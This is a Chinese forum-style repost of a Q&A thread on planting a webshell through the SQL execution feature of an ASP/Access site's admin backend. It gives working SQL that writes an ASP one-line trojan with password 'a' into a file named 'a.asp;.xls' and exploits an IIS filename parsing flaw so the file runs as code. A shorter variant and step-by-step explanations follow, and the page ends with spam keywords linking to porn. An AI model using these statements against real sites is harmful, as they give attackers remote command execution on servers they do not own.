請登錄后使用快捷導航
沒有帳號？立即注冊

ACCESS數據庫后臺sql語句執行導shell的方法

2022-9-26 13:01| 查看: 2116 |來源: 互聯網

需要什么條件，語句又是什么？網上翻不到資料。麻煩各位。答： create table cmd (a varchar(50)) insert into cmd (a) values ('<%execute request("a")%>') select * into [a] in 'f:\host\qhdyxt\web\a.asp;

需要什么條件，語句又是什么？網上翻不到資料。麻煩各位。

答：

create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd

解釋如下：
1.create table a (a varchar(50)) 建立一個有一個A字段的表表名為a 字段類型為字符長度為50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內容導出為物理路徑的一個
EXCEL文件，為什么用excel文件，因為ACCESS數據庫不允許導出其他危險格式。我們導出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說～～
4.drop table a 丟家伙閃人射完就走！

小弟的提問，沒兩分鐘大家就回答了，強烈頂t00ls牛淫。

這個更簡單：

Access利用后臺SQL執行命令功能導出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后臺提供SQL執行功能且知道絕對路徑方可使用(vote為已知表段)

本文最后更新于 2022-9-26 13:01，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：17tui@17tui.com

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：webshell下提權兩個小技巧分享上一篇：serv_u提權記錄: 530 Not logged in, home directory does not exist

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

色婷婷国产精品免费网站_av在线官网_色综合色综合_欧美精品一区二区三区蜜桃视频_成人免费视频观看视频_国产午夜精品一区二区三区视频

ACCESS數據庫后臺sql語句執行導shell的方法

大家都在看

相關分類

熱門排行

最近更新